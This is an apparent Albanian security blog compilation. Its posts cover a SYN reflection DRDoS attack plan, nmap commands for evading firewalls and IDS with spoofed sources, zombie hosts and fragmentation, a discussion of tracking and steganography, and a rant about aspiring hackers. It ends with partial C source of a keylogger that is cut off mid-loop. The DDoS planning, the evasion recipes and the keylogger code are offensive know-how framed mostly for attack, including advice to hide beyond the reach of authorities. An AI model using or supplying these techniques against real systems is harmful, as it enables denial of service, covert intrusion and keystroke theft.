Ne kete rast sulmuesi nuk ka te bej fare me viktimen, dhe ai te themi te drejten nuk kontakton aspak me te..
Po, poo…. hmmm po si ja ben?

Per Raw Socket keni degjuar?
Ky “tipi” te lejon te modifikosh headerin e paktave qe dergon kompiuteri yt ne net, shume programe si nmap, ftester, hping3 , unicornscan, e keshtu me rradhe e perdorin dhe si e modifikon headerin?
SPOOFING 😀
Kjo eshte me interesantja e ketij sulmi, pasi sulmuesi modifikon headerin e paketave (SYN) normalisht  dhe tek kjo paket normalisht eshte e shkruajtur ndermjet te tjerave:
IP-ja Origjinare (IP-ja qe ka kerkuar lidhjen)
IP-ja e Destinacionit (Normalisht Destinacioni)
FLAG (Lloi i paketes , [Syn, Syn-ack, fin, null, e keshtu me rradh]
Keto mund te modifikohen shume thjesht me ane te Raw  Socket dhe gjeje pak 😀
Tek ip-ja origjinare vendosim Ip-n e viktimes, Flag do te jete normalisht SYN, e destinacioni… eh destinacioni xD
Destinacioni do te jene Routerat me te fuqishem qe lidhin sot nyjet kryesore te internetit.
Por routerat do e bllokojn sulmin ton fload … hehehehe, pikerisht ketu eshte e bukura sepse nuk do te behet asnje fload..
Po e shpjegojm shpejt e shpejt, nese une i çoj nje paket serverit X (e ne realitet ip-ja nuk eshte imja por eshte e viktimes) serveri X do i pergjigjet IP-s qe shikon ne paket me nje SYN-ACK dhe kete SYN-ACK nuk na e dergon neve, por ip-s qe eshte tek paketa TCP dhe ne kete rast viktimes i vjen nje pakete e vlefshme SYN-ACK te cilen nuk di se ku ta çoj dhe vet nuk i dergon tjeter pasi ne realitet nuk i ka derguar asnje SYN (paket per sinkronizim) e serveri tjeter pret paketen ACK per te kompletuar handshake por ajo nuk vjen keshtu qe ç’fare te bej?, i çon dhe 2 paketa te tjera SYN-ACK duke menduar se paketat nuk kane arritur dhe mbas kesaj e le lidhjen duke e trajtuar viktimen si offline.
Eh, 3 paketa vertet nuk bejn shume pune, po imagjinoni sikur ti dergojm ç’do 2 sec nga 1 paket 200 routerave core, 😀
Eh, do te gjenerohej nje trafik 200 x 3 = 900 paketa SYN-ACK per sekond, e imagjinoni sikur lista e routerave apo serverave te ishte 2000 dhe jo 200 dhe makinat nga po dergohet sulmi te ishin 10 dhe jo 1 … emmmm…. BUM!!!
Tamam, viktima do te binte ofline per sa kohe qe te vazhdonte sulmi, dhe ky eshte pak a shume nje DR-DOS, dhe quhet Reflection pasi sulmi nuk gjenerohet as nga Zombie dhe aq me pak nga 1 makine, por nga serverat dhe routerat me te fuqishem, ose me sakt nga nyjet kryesore te internetit te cilat pa dieni perdoren si mjet per sulm dhe realisht paketat SYN-ACK qe dergojn jane te rregullta dhe asnjera nga ato nuk eshte e pavlefshme.
Ok, shpresoj se e kemi te qarte dhe per ata qe ja kane idene sigurisht qe jemi te qarte perkundrazi, ç’fare na the ore Ardit keto gjera i dime, DRDOS ka qe ne 2001shinq e ka dale ne qarkullim…
Eh, e di, tani te kalojm tek nje zhvillim proof of concept i kesaj teknike.
Jane thjesht mendimet e mia, normalisht nuk e kam aplikuar dhe as qe besoj se do e aplikoj vetem nese dikush do te ngeli per ca ore offline lol, po keto gjera jane dhe te denushme nga ligji.
Ja se ç’fare po mendoja..
Me ane te nmap, ne mund te krijojm map-en e nje hosti, routerave qe e rrethojn , tani nuk eshte njelloj si cheops-ng (ky eshte per networkun e brendshem) por ja vlen. E per aryse nuk po jap as komandat qe mund te sjellin rezultate te tipit:

Me kete dua thjesht te hedh idene, qe:
Mund te krijohet nje map e te gjith routerave\serverave\hosteve qe jane te lidhura me viktimen, dhe mund te merren adresat ip te tyre.
Mbasi behet kjo gje fillohet nje analizim i holle i secilit prej ketyre hosteve duke pare se ç’fare portash kane te hapura, dhe me ane te aplikacioneve si firewalk\ftester mund te testohen se deri ne sa paketa syn (pa synack) pranojn perpara se ti bllokojn, analizohen portat e perdorura dhe  ne baze te tyre te ndertohet nje aplikacion i cili do te bej spoof ip-te e tyre te cilat jane ngjitur me viktimen dhe ne kete menyre (duke qene se jane dhe me afer dhe paketat shkojn me shpejt) viktima do te gjendet ne mes te nje kaosi total, pasi paketat i vin nga te gjitha drejtimet, hidhini nje sy skemes:
http://albanianwizard.org/ngarkime/zenmap.jpg
Pse kjo?
Sepse nese nje server ndodhet nen kete lloj sulmi, nese Administratori i ISP-s eshte i zgjuar, do te bllokonte paketat qe vijn nga nje trung lidhjeje , eshte si puna e lumenjve psh paketat per te ardhur ne det perdorin lumin vjose, ndersa Administratori bllokon lumin vjose dhe lejon shkumbinin, danubin 😛 etj atehere sulmi nderpritet edhe pse me kete levizje Administratori bllokon nje pjese te mire te internetit dhe hedh posht shume klient qe duan ta perdorin ate server por shpeton ne te njejten kohe serverin.
Ndersa kjo qe thash me siper, do e bente te pamundur te kuptohej se nga vjen sulmi ne realitet pasi viktima do te gjendej ne qendren e ciklonit dhe tafti bafti ne keto pune nuk behet, do te duhej pak kohe derisa Administratori (po flas per ata me shkolle) te instalonte sniferat ne te gjitha hostet lokale dhe te kuptonte se nga realisht vjen ky sulm.
Nga ana tjeter metoda te tjera mbrojtjeje si psh mbyllje e portes se sulmuar apo mbyllje e portes nga e cila vjen paketa do te ishte feminore pasi mjafton nje algoritem dhe sulmuesi mund te perdorte source porta me nje rreze  po e zem nga 40000-50000 (normalisht portat qe perdor clienti per tu lidhur me nje server jane te larta, kurse portat qe perdor serveri per tu lidhur me client jane te vogla, mjafton te monitoroni per disa çaste portat qe perdor kompiuteri juaj per te komunikuar me porten 80 te google.com)
Kaq per kete, nuk do te thote qe nuk e kam zhvilluar me shume si koncept porse ne kete rast eshte me mire ta mbyllim me kaq :)
Shendet.

AVG Internet Security – Firewall Bypass

Pershendetjeeeee,
ja ku po i kthehemi dhe njehere siguris,… kesaj rradhe me nje teme goxha te veçant e cila evitohet te trajtohet nga te gjithe pak a shum pasi nga njera ane, jane kompanit qe prodhojn firewalle \ IDS \IPS \NIDS, dhe spara duan keto lloj materialesh e nga ana tjeter dhe ata qe perdorin teknika per bypass apo firewalking siç quhen nuk duan te hapin edhe aq shume informacion pasi vete ata jane si shefa sigurie ne ndonje kompani dhe keto jane pak informacione te rezervuara :)
Une nuk mbaj pergjegjesi per perdorimin e tyre per qellime negative, keto jane vetem per zhvillimin e horizontit dhe zgjerimin e njohurive.
Kesaj teme do i drejtohemi ne 2 prespektiva te ndryshme, ne prespektiven e atij qe thjesht po teston qe do e quajm PLAYER, e ne prespektiven e atij qe realisht i intereson dhe merret me keto pune.. Penetration Testerit apo “Hackerit” siç quhet nga masa..
Kjo teme nuk eshte per script kiddiez keshtu qe nese jeni duke lexuar, go sql-inject something xD.

PLAYER

Ne kete nivel jam dhe une qe po beja qejf (testing) me firewallin e shokut tim i cili ka nje windows xp :( + avg internet security te fundit, e as nuk di se kush eshte i fundit pasi nuk me interesojn antiviruset te gjith ta shpifin pa perjashtim.Keshtu qe meqenese ata ta shpifin thash ti hedhim nje sy firewallit..
Kjo pak a shum eshte pamja kur kemi te bejm me nje network ku kemi nje firewall hardware dhe nje kompiuter mbas tij..

Por rasti im nuk eshte ky, ne kete rast ku une duhet te luaj pak me kompiuterin , vete hosti (kompiuteri) eshte firewall dhe luan rolin e tij duke filtruar lidhjet me networkun qoft te brendshem qoft te jashtem.
Keshtu qe , do merremi pak me firewallin.
Per te mos e komplikuar shume si teme , po permend vetem ato qe mund ti behen ketij firewalli me nje aplikacion te njohur si nmap (po i le menjan hping3, ftester, firewalk etj)
Le te testojm dhe firewallin tone…
Ne kete rast, une kam ip 192.168.1.100 kurse viktima ka ip 1 me shum (192.168.1.101).
Ne keto raste e dime qe firewalli meqenese eshte i axhornuar dhe eshte i vitit 2009 e dime qe do te bej filtrim dhe e rendesishme eshte per ne qe mos te regjistrohen loget e skanimit ne firewall, normale bypass dmth qe duhet te bypass-ojm rregullat e firewallit \filtrimit keshtu qe si i behet?
Per kete na vijn ne ndihm keto opcione tek nmap (v 4.7x)
-T (T0 deri tek T5)
-f ose –mtu
-D , decoy
dhe si gjithmon tradicionali half-open scan me opcionin -sS (SYN Scan).
-T eshte koha ne baze te se ciles nmap do te çoj paketat -T 5 eshte maksimumi i paketave qe do te çoj (normalisht kerkon nje network te shpejt dhe nje ip te afert [perdor –traceroute per info] dhe -T 0 dhe -T 1 ne keto raste jane opcionet me te mira pasi i çojn nga nje paket here mbas here por ashtu siç paketat dergohen shume ngadal duhet te kemi te qarte qe dhe skanimi do te jete shume i ngadalt dhe mund te zgjasi 18 ore , e per te evituar kete keshillohet te perdoret dhe opcioni -F per te skanuar portat me te zakonshme.
-f eshte fragmentation attack, dhe nuk eshte asgje tjeter perveç se te ndaj paketat ne paketa me te vogla gje qe ndodh shume shpesh qe hoste windows nuk e suportojn (hostet linux e suportojn) e ne kete menyre behet bypass analizuesve te paketave pasi behet i veshtire analizimi i paketave ndersa -D decoy eshte nje lloj sulmi tjeter i cili i thote targetit qe po sulmohet nga ip qe i percaktojm ne, nderkohe qe tonen perpiqet ta fsheh.
Si fragmentation attack me -f (qofte dhe me opcionin me te avancuar –mtu duke i bere split paketave ne 8 bit secila) ashtu dhe -D nuk funksionuan me Firewallin e AVG dhe firewalli mbajti loget e skanimit.
Perpara se te fillojm njeher, me macchanger ndryshojm mak adresen tone keshtu qe nuk kemi nevoje ti bejm spoof ne momentin qe perdorim nmap, e keshillueshme eshte te perdorim nje host qe eshte i besueshem tek viktima.
Vazhdojm, me skanimet e bera ky Firewall filtrat e tij ne pergjithesi i kishte te bazuar ne koh dhe asgje tjeter xD, keshtu qe per ti bere bypass e per te mos rregjistruar skanimin ne loget e tij mjafton qe te perdorim opcionin -T0 apo -T1 dhe firewalli nuk do e regjistroj aktivitetin e skanimit.
Po ashtu, nese bejm ip spoofing psh:
nmap -S 127.0.0.1 –mtu 8 -sS -A -T 5 -f -p0-65535 -PN 192.168.1.101 -e wlan0
Ne kete rast paketat firewallit i vijn nga localhost dhe edhe pse trafiku eshte ne maksimum ai nuk i shikon paketat qe i dergohen, kjo ip mund te jete dhe serveri qe ben update antivirusi dhe gjithashtu firewalli nuk do e regjistroj as kete aktivitet porse ne kete rast skanimi nuk do te jete konstruktiv sepse skanimi do i pergjigjet ip-s qe eshte ne headerin TCP e jo neve (pra do i pergjigjet 127.0.0.1-shit dhe jo neve) po atehere cili eshte perfitimi i ketij skanimi?
Do e shohim tek pjesa e dyte.
E mira e ketij firewalli eshte se i filtronte te gjitha portat qe nga 0 deri tek e fundit 65535, biles pash qe te bllokonte dhe vet trafikun e brendshem (netbios) midis portave 138-139 edhe pse ky ishte UDP.
Po ashtu filtronte dhe kerkesat ICMP\IGMP.
Keshtu qe perfundimi per kete firewall eshte qe mund ti behet bypass duke evituar qe te kapesh , porse ky skanim ne kete rast eshte pa dobi pasi kemi skanuar nje laptop personal i cili nuk ofron asnje sherbim dhe per me teper eshte ne nje intranet.
Gjate skanimeve eshte shume e keshillueshme qe te perdoret wireshark per te pare nese realisht po ndodh ajo qe i kemi komanduar nmap-it (psh ne disa raste ndodh qe nuk ben copetimin (-f) e paketave).
Po realiteti kur kemi te bejm me korporata eshte ndryshe :), sepse ato ofrojn sherbime dhe qe te ofrojn sherbime duhet te kene ndonje port hapur 😀

PEN-TESTER

Eh, ne kete rast behet seriozisht :)
Tani nuk kemi me nje kompiuter, por kemi nje IDS te mire e te modifikuar nga nje ekspert e ne kete rast bllokon dhe sulmet Xmas scan, Fin Scan, e sidomos sS Syn Scan i cili eshte me i perdoruri per keto pune..
Ne kete rast kemi dhe nje IPS (intrusion prevention system) , si dhe Honyepot.
Nuk do ua mbush mendjen me budallalleqe e tu them se eshte diçka e lehte, e sidomos me rastin e Honeypot, per keto gjera duhet eksperienc, njohuri dhe mbi te gjitha nje intuit e tmerrshme, e si i behet hallit kur kemi te bejm me keto raste?
Ne psh, e dim qe ‘ata’ e kane nje port te hapur (perderisa jane kompani dhe ofrojn sherbime) po cila.. ?
Keshtu qe duhet te skanojm:

Rregulli 1.
Ku ta çojm ip-n ore :S, po mac adresen?, keshtu qe  do te perdorim  opcionin -sI e ç’fare eshte ky opcion?
Do i dergojm paketat ndermjet nje makine tjeter, qofte ky server diku qe eshte nen kontrollin tone, e keshtu  te pakten nuk do  te shohim ip-n tone nese nuk bejn kerkime  ISP mbas ISP-je e idealja eshte psh qe te kemi nje server ne rusi, po ne kine apo diku ku autoritetet te mos kene forc per te shkuar atje e per te marre vesh se kush ka qene roshi 😉
E keshtu pra ky opcion -sI na lejon qe te specifikojm nje host tjeter, e kjo eshte kryesore ne keto lloj rastesh.
Ne nderrim te kesaj, do te sugjeroj nje teknik tjeter shume me te mire 😀
E zeme se ne kemi nje server ne  korene e veriut nen sundimin tone, dhe ai ka nje ip po e zem  127.127.127.127 :P, atehere ne i bejm spoof ip-s dhe tek serveri ne kohen e skanimit instalojm nje snifer i cili do te rregjistroj te gjitha paketat qe do vijn e po ju kursej se kur vjen ACK eshte porta e hapur etj etj etj .
Keshtu ne kete form, ne mund ta dergojm skanimin nga nje ZOMBIE nderkohe qe hosti do i pergjigjet paketave ne nje server qe nga ana e tij eshte ne qetesi dhee gjith kjo nga nje IP spoofing e adreses se serverit.
Normalisht mos harroni te nderroni mac adresen.
Rregulli 2.
-T 0 (pranaoid) duke derguar sa me pak paketa qe te jete e mundur ose mund te specifikojm dhe vet ne kohen qe duhet te presi nmap mbas dergimit te nje pakete, me te vertet do shume kohe por nese ja vlen barra qirane atehere dhe durimi eshte pjese kryesore.
Rregulli 3.
Po mir mo zoti Ardit, the qe ai Zoti CSO (Chief Security Officer) ka nje ids qe na bllokon ne si skanimin -sS\-sU\-sF\-sN\-sX atehere si i behet?
hehe, vertet egzistojn filtra ne IDS kunder paketave qe vijn me Flag SYN apo [] (null) apo FIN, apo URG, PSH, FIN siç eshte Xmas e si i behet hallit ketu?
Ketu vjen ne ndihme opcioni –scanflags duke krijuar nje lloj skanimi te personalizuar pasi IDS-ja psh ka rregullin qe te bllokoj vetem FIn scan, SYn SCAn, Xmas Scan, Null Scan e jo skanim te personalizuar siç mund te jete psh –scanflags SYNFIN (me flags te dyzuar) apo SYNACK, e keshtu me rradhe.
E nese ka filtra edhe per keta?, atehere kemi te bejm me NSA xD po ka perseri metoda bypass-i por nuk eshte as koha e as vendi per to (ps, thash qe do perdorim vetem nmap duke lene anash te tjeret 😉 ).
Rregulli 4.
Fragmentimi i paketave do te bej te veshtire analizimin e tyre, keshtu qe i japim nje –mtu 8 ose –mtu 16 ose –mtu 32 (  plotpjestohen me 8  ) ne menyre qe te ndajm paketat.
PS nese perdorni opcionin –mtu nuk perdoret me -f pasi me -f ju i lini nmapit te zgjedhi se ne sa bite do ti ndaj paketat ndersa me –mtu i specifikoni vet.
Rregulli 4.
Mos bej ping dhe mos bej reverse DNS. Jane ne demin tend keshtu qe po shtojm -PN dhe -n.

Finalizimi..
nmap -S 127.127.1.1 -n -sI 127.127.127.2:80 -PN –mtu 8 –scanflags SYNFIN -T 0 -F TARGET -e wlan0 –reason
Kete lloj skanimi po e pagezojm me SuperStealth pasi ne realitet paketat do te dergohen nga nje  kompiuter Zombie i cili eshte nen kontrollin tone dhe ne keto paketa IP-ja do jete e nje serveri tjeter (jo ip-ja e Zombiet) tek i cili do te kthehen pergjigjet nga hosti i skanuar (sepse i kthen pergjigjet tek IP-ja qe shikon dhe IP-ja eshte Spoofed qe do te thote se eshte e Serverit tone ne kore 8) ) e lind pyetja, kur pergjigjet ACK\SYN etj do te dergohen tek hosti atehere si do marrim vesh se cilat porta jane hapur e cilat jane mbyllur?
Tek ai host do te leme wireshark aktiv dhe ne perfundim te tij do te shohim te gjith aktivitetin e skanimit dhe do analizojm paketat me dore, per kete thash se nuk eshte pune per script kiddiez pasi duhet te njohesh lloin e skanimit –scanflags SYNFIN apo diçka tjeter dhe pergjigjet (ACK apo DROP, etj) qe jep nje host kur ka porta te mbyllura te hapura, apo te filtruara.
Komentojm skanimin.

127.127.1.1 eshte serveri yne ne korene e veriut 😛 ku kemi instaluar nje snifer i cili do te rregjistroj gjith trafikun e mbas perfundimit te skanimit do te kontrollojm me dore per pergjigje qe kane porta te hapura.
Me opcionin -S ne manipulojm paketat qe dergon nmap duke bere keshtu qe adresa derguese te jete 127.127.1.1 nderkohe qe skanimi realisht po behet nga zombi i cili gjendet ne adresen 127.127.127.2:80 (perdorem porten 80 pasi eshte nje port e zakonshme e ne varesi te targetit dhe sherbimit qe ofron behet dhe kerkesa per porten). -PN per te mos ber ping ICMP tek hosti duke marre persiper qe hosti eshte online, –mtu 8 per ti bere split paketave tona ne grupe prej 8 bitesh ne menyre qe te behet i veshtire analizimi nga IDS-t, apo nga Packet filtruesit. –scanflags SYNFIN per ta bere skanimin te pakapshem nga IDS-ja e kjo eshte me e rendesishmja, paketat nuk duhet te bllokohen nga Firewalli apo sistemet e ndryshme mbrojtese. -n per te kursyer kohen per te bere reverse DNS , -T 0 per ta bere dergimin e paketave shume te ngadalt nje menyre kjo e nevojshme per te bere evadimin nga sistemet e sigurise dhe mund te specifikojm dhe interface eth0, wlan0, ath0 varet se ç’fare karte rrjeti po perdorim dhe –reason per te pare aryen se pse nmap na ka dhene open\filtred\closed etj etj per nje port te caktuar.
Mbi kete normalisht duhet te dime se ne baze te skanimit ç’fare eshte pergjigja qe tregon per nje porte te filtruar e per nje porte te mbyllur e per nje honeypot xD 😉
Per kete nuk ka tutoriale.
Besoj se e shijuat deri ne fund, nese nuk keni kuptuar gje apo keni gjera qe nuk i kuptoni nuk eshte fai im.
Pyesni.

Arti I Tracking dhe Kunderpergjigja (crypto apo Steganography)

Flitet shume per privacy apo JO?

Yep, edhe une degjoj shume te flitet per te, ne kete teme nuk do te flasim as gjeresisht dhe as shkurtimisht per thjeshtesine me te cilen dikush mund te marri vesh dhe te kete shume informacione per ty personalisht.
Mos ma vini re nese nuk do i them shume gjera ne rend, por do permend teknikat qe perdoren per keto lloj veprimesh nga persona privat apo persona shteteror (SHTETI :D).
Meqenese je duke lexuar kete teme, kompiuteri yt ne baze te ligjeve te internetit ka nje adrese IP e cila ne ate moment eshte unike per kompiuterin tend dhe nje targ identifikuese gjithashtu per kompiuterin tend ne ate moment.
IP-t jane :

  • Statike (rast ku ip-ja jote eshte e pandryshueshme dhe ne keto raste dhe DNS-t gatway etj) jane fikse dhe duhen impostuar manualisht
  • Dinamike ketu keni me shume fat pasi ip-ja ndryshon ç’do here qe lidheni ne internet
  • PS (nuk po merrem me trajtimin e ip-ve ne veçanti me klase A etj etj sepse nuk eshte tema keshtu qe pranoini keto dy kategori ne aspektin e privacy dhe tracking)

IP-ja ===>Routeri\ADSL\WIRELESS\ETJ\===> Networket e IPS-s , Broadband ,ISDN, PSDN, kemi Backbone dhe te gjitha paketat TCP\IP, UDP, ICMP, apo paketa ne form peshtyme 😀 qe dalin nga kompiuteri yt, qe te shkojn tek xhaxhi interneti duhet te kalojn njeher ne routerin e shtepise tende, pastaj neper routerat e ISP-s (atij qe te jep internetin) neper firewallet e tyre hardware, routerat c0re, serverat e ndryshem (na baze te sherbimit apo lloit te lidhjes) dhe pastaj perfundojn tek interneti.
Keshtu qe dikush thot,
Po un perdor proxy !!
Qe te shkojn paketat e tua tek proxy duhet te kalojn serisht permes ISP-s, dhe qofte kjo web-proxy, cgi-proxy apo ç’faredo-proxy ti nuk mund te shpikesh nje IP, tenden dhe te kalosh paketat neper routera imagjinare te ISP-s qe ndodhet ne trurin tend keshtu qe :
HARROJE ANONIMITETIN!

Qe ti biem shkurt, me sherbime online si robotex.com apo domaintools.com mund te gjenden te gjitha te dhenat e mundshme rreth adreses IP duke bere traceroute per te pare se distancen midis hosteve te ndryshem, mund te merret informacion mbi dns-t  (dns lookup), mund ti behet reverse ip per te pare ip-t e tjera qe jane ne te njejtin vend e  me disa sherbime te tjera edhe hostet\kompiuterat\routerat\ etj qe jane afer me ip-n tone te dashur, dhe kjo vetem nga nje email.
Per kete arsye, nuk keshillohet te perdoren emaile si hotmail, yahoo, email apo ku ta di un qe nuk japin ip private ne momentin qe dergohet emaili keshtu qe mos te flasim pastaj per vizita neper webfaqe apo ç’do komunikim te lloit tcp, udp, icmp, igmp e keshtu me rradh.
Pra mjafton qe ju te keni nje ip, dhe rreth asaj mund te arrihen te gjitha informacionet e mundshme mos te flasim pastaj nese i interesuari per informacion perdor aplikacione apostafat per te marre me shume te dhena rreth sistemit tuaj, programeve te instaluara (ne rast per identifikim vulnerabiliteti), dhe keto pa u vene shume re nga nje perdorues i shkujdesur si puna juaj :).
Kalojm tek diçka tjeter me e rendesishme.
Nese dikush u ka piketuar hehe :D, atehere ai do bej çmos per te marre vesh se kush jeni ju, identitetin tuaj dhe gjerat me te zakonshme jane te kerkoj me emailin tuaj ne google, nicknamet qe perdorni, te hamendesoje facebook-un tuaj, apo ti kerkoj ndonje shoku qe ka ne dore facebook-un informacione shtese mbi ju.
Nese kerkon akoma me shume, do te kerkoj te afrohet me shume, do te vizitoj forumet qe vizitoni ju, do te perpiqet qe te kete ne msn,\skype, etj dhe aty do filloj me Social Engineering dhe perfundimi do jete qe do dij me shume ai per ju se sa gjendja civile. E meqe ra fjala nese eshte tip akoma me shume i eger ne kete zanat do te kerkoj informata per ju ne sisteme shteterore si psh, SHIKU, POLICIA , GJENDJA CIVILE, Do te hyj ne sistemet ku ju keni kryer shkollimin tuaj, apo ne sistemin e ndermarrjes tuaj.
Dhe e gjithe kjo per nje person ç’faredo [jo dhe aq ç’fare do e :p] i cili eshte perpara nje kompiuteri.
Po ne rastin e dikujt qe ka ne dore lejen per te hyre ne ISP-t e ndryshme?
LoL, ç’do bit qe do dali prej kompiuterit do te analizohet dhe do te shikohet me vemendje ç’do levizje pa dallim moshe,feje krahine ideje dhe per te kjo eshte shume me e thjesht sepse ka akses ne providerin tuaj dhe mjafton qe te vendosi nje snifer ne interfacet me te perdorura duke monitoruar gjithçka qe ndodh, edhe takimin e kompiuterit tuaj me proxy-n qe eshte ne nje ISP tjeter.
Pra ne kete rast jeni akoma me i vdekur pasi nuk ka dhe nuk egziston ndonje mundesi qe ju te kryeni qoft gjen me te vogel dhe te jeni anonim.
Kalojm tani tek disa qe perpiqen te bejn “te zgjuarin” dhe perseri kapen me presh ne dore :S
Keni degjuar per Anonymization Application Programming Interface (AAPI) ?, po per Crypto-PAn? po per IP::Anonymous? , besoj qe vetem nga :: e moret vesh qe eshte modul i perl heheh, jeni shume te mire e di :D.
Per me shume info rreth ketyre aplikacioneve \ metodave drejtojuni:
http://www.caida.org/tools/taxonomy/anonymization.xml
Mire per te mos e komplikuar shume te themi qe disa preferojn qe te bisedojn apo te lundrojn ne mes te tuneleve  te encryptuara dhe shpesh here funksionojn kur kemi te bejm me hundlesha po kur kemi te bejm me persona qe merren me ate pune, heh, si thoni ju kush terheq me shume vemendje ne nje lum ku kalojn njerez me varka dhe aty eshte nje roje, dikush qe e ka fytyren te zbuluar apo dikush qe eshte i mbuluar me çader?
Yep, dikush qe e ka fytyren te mbuluar me çader dhe ky tipi i monitorimit do te bej çmos qe te gjej çelesat apo passwordet e lidhjes apo do te mundohet te decryptoj keto paketa dhe kete nuk mund tja ndaloj askush pasi AI tipi eshte SHTETI keshtu qe heret a vone do decryptoj lidhjen dhe,,.. te piu e zeza :D!
Shpesh here keto gjera i bejn edhe duke penetruar drejtpersedrejti ne makinen tende, pasi kane akses ne ISP, dhe qoft ne nje aplikacion ne nje tjeter do  e gjejn nje vulnerabilitet qoft edhe nje bof exploit apo diçka tjeter dhe END OF STORY.
Folem shume per tracking, ose me sakt per filozofine e saj pasi per ç’do metod te mesiperme duhet nga nje paper i mire per te shpjeguar me imtesi, e le te flasi pak tani per Steganography-n.
Marrim rastin e nje adrese email,
Nese emaili juaj ka fjale si: hack, Bum, Vjedhje, Krim, Vrasje, Perdhunim, pare, Lek, mall, etj etj atehere ai normalisht kalohet per tu analizuar, edhe nese emaili eshte i encryptuar te jesh i sigurt qe dikush merret dhe me decryptimin e tij e pikerisht ne kete pik vjen steganography dhe eshte nje koncept ‘security through obscurity’ dhe ka te bej me menyr komunikimi me fjale,imazhe, artikuj, e keshtu me rradhe pra ç’faredo lloj gjeje qe nuk bie absolutisht ne sy. PSH:
From shpirti@hotmail.com
To : zemra@hotmail.com
Title: Shif pak fotot tona ke liqeni 😛
Dhe fotot jane te renditura ne nje lloj menyre qe atij qe i sheh ne baze te nje rregulli i thon diçka, pra eshte nje lloj komunikimi ne kod i njejt me konunikimin me gjestikulacione qe bejn dy persona pra duke folur me sy, pa i thene njeri-tjetrit diçka ne forme verbale.
Diçka akoma me e sofistikuar e kesaj eshte pershembull ti dergosh atij me te cilin do te komunikosh nje email sikur po i dergon nje arkiv .zip me muzik mp3 apo me nje foto te djalit apo ku ta di une diçka normale qe nuk bie ne sy dhe nese arkivi hapet me notepad, apo me nano apo me vim ne te ka nje mesazh per personin qe e lexon.
Zakonisht ata qe merren me steganography ndryshojn vazhdimisht metod komunikimi dhe psh nje fjali e tipit “Sot ja kalova mire me bonen ne qytetin tim te dashur” mund te kete kuptimin, kalo mallin ke dogana e kapshtices apo diçka e tille.
Pra kompiuteri do te shoh nje email shume normal dhe do te kaloj filtrat si i parrezikshem, ose i parendesishem dhe nuk do te beheni pre e ketyre  sulmeve.
Tema mbi Steganographyn eshte shume me e gjere dhe eshte rast me vete, dhe eshte nga shancet e vetme ku mund te sigurohet pak anonimitet dhe pak privacy.

Hacker MANIA!!

Ej , po ça behet keshtu mor daj!!

Gjithanej hackera po shohim ?
S’po e marr vesh kete pune xD,

Mblidhen nja 3 -4 kalamaj, instalojn nje vBulletin (qe e kane mesuar ta instalojn me videotutoriale) edhe oburra forumi i radhes qulli_na_bashkoi-crew ?!?
Edhe po te shohesh permbajtjen e tyre ke vetem warez, po ç’lidhje ka warez me sigurine ne informatike?
E kam titulluar hacker mania, sepse ne nje universitet shqiptar (lajm qe me ka ardhur nga burime te sigurta) njeri nga studentet kur eshte pyetur se pse zgjodhi informatiken pergjigja ishte:
DUA TE BEHEM HACKER
:L

Imagjinoni shokimin e pedagogut mbas asaj pergjigjeje?
Nje CS student te thote, u futa ne UNI per tu bere hacker?
Nga vjen i gjith ky dizinformim?
Dhe me e rendesishmja , pse duan te gjith kalamajt te behen hacker.

Po jetojm ne nje kohe ku kompiuteri dhe interneti jane bere diçka e pandashme e jetes se perditshme.
Dhe normalisht forume te ndryshme shqiptare apo jo, tentojn te terheqin sa me shume idiota neper veprimtarit e tyre boshe dhe pa kuptim te tipit:
“Vjen nje moment dhe…”
“Sot puth ….”
“Nje puthje per arixhiun..”
“Hajdari kerkon moter..”
E te tjera si keto:
Pse i them idiot?
Si mund te quhet nje person qe kalon 4 ore perpara kompiuterit duke marre pjes ne gjera te tilla?
IDIOT
Tamam, edhe une ashtu mendoj xD.
Keshtu qe ne vazhden e fushatave elektorale te quajtura ndryshe fushata spami, ata ofrojn sherbime te PAPERSERITSHME XD si:
muzik xD, chit-chat, sms-mms-space shattle falas, “gjej dashurine e jetes”, shkarko pa limit (nga rapidhsare :L), behu hacker dhe ….
Pikerisht ne ato “…………” duam te gjejm.
Pasi eshte e ditur , apo eshte kthyer ne nje gjendje psiqike qe nese je hacker, je trendy, apo diçka e madhe, apo ku ta di un, rezultati qe mendojn femijet eshte qe jane ne qender te vemendjes dhe nuk e mendojn qe kjo “qendra e vemendjes” eshte ne kundershtim me te qenurit hacker xD
Realiteti i ketyre komuniteteve?
Deshtime te plota,
Edhe vet ata qe i drejtojn jo qe nuk jane PEN-TESTERS (hackers siç i quan masa) porse nuk ja kane idene minimale informatikes, Programimit e lere pastaj Penetration-Testing\Auditing.
Ja ku dolem qe krijohet nje rutine ne aktivitetet boshe qe ndermerren, dhe konsiderohet si pune papunesia, apo marrja me gjera te kota qe nuk te sjellin dobi.
Si mund te konsiderohet pune papunesia?
Ç’fare pune te ben babi?
-Hiç pa pune
Po ti?
-Ja ndihmoj babin nga pak

– :'(

U bej thirrje te gjith atyre qe e kane rastin ta lexojn kete teme, qe te angazhohen ne perhapjen e informacionit qe edhe nese eshte dikush qe vertet i intereson informatika mos ta humbi kohen e vet me keto idiotlluqe por ti drejtohet studimit real te informatikes dhe kjo nuk behet as duke u abonuar me RSS tek AlbanianWizard.Org e as duke u abonuar neper webe (qe i harrova) te tipit “Microsoft ka pushuar 2000 veta nga puna” wtf?
apo “Redhat sot ngriti flamurin ne vlor” :L
Pra gjera te tilla qe jane thjesht lajme dhe synojn me shume ne publicitet se sa ne dituri.
Drejtojuni librave, dhe materialeve serioze qe flasin per kete pune dhe jo kafsheve qe duan te ven lek me 2 google ads.

Nje kod i lezetcem keyloggeri ne C

/* *
* exkey - excluded keylogger *
* *
* This program is free software; you can redistribute it and/or *
* modify it under the terms of the GNU General Public License *
* as published by the Free Software Foundation. *
* *
* For educational purposes only. *
* *
* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - *
* Written by: FuSi *
* VERSION 0.0a <fusi@excluded.org> *
* <www.excluded.org> *
* / close your eyes & dream with me / *
* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - *
* *
* */
#include<sys/types.h>
#include<fcntl.h>
#include<stdio.h>
#include<time.h>
#define kp 0x60
int main(int argc,char **argv){
int fd;
int prm=0,dm=0;
struct timespec *ts;
if(argc < 2){
fprintf(stderr,"exkey - excluded keylogger\nwritten by FuSi (fusi@excluded.org)\nversion 0.0a\n\nJust type: ./exkey <logfile>\n");
exit(1);}
if((fd = open(argv[1],O_CREAT|O_WRONLY|O_TRUNC)) == -1){
perror("open()");
exit(1);}
asm("int $0x80;": :"a"(101),"b"(kp),"c"(1),"d"(1));
ts->tv_nsec = 20;
ts->tv_sec = 0;
while(1){
dm = prm;
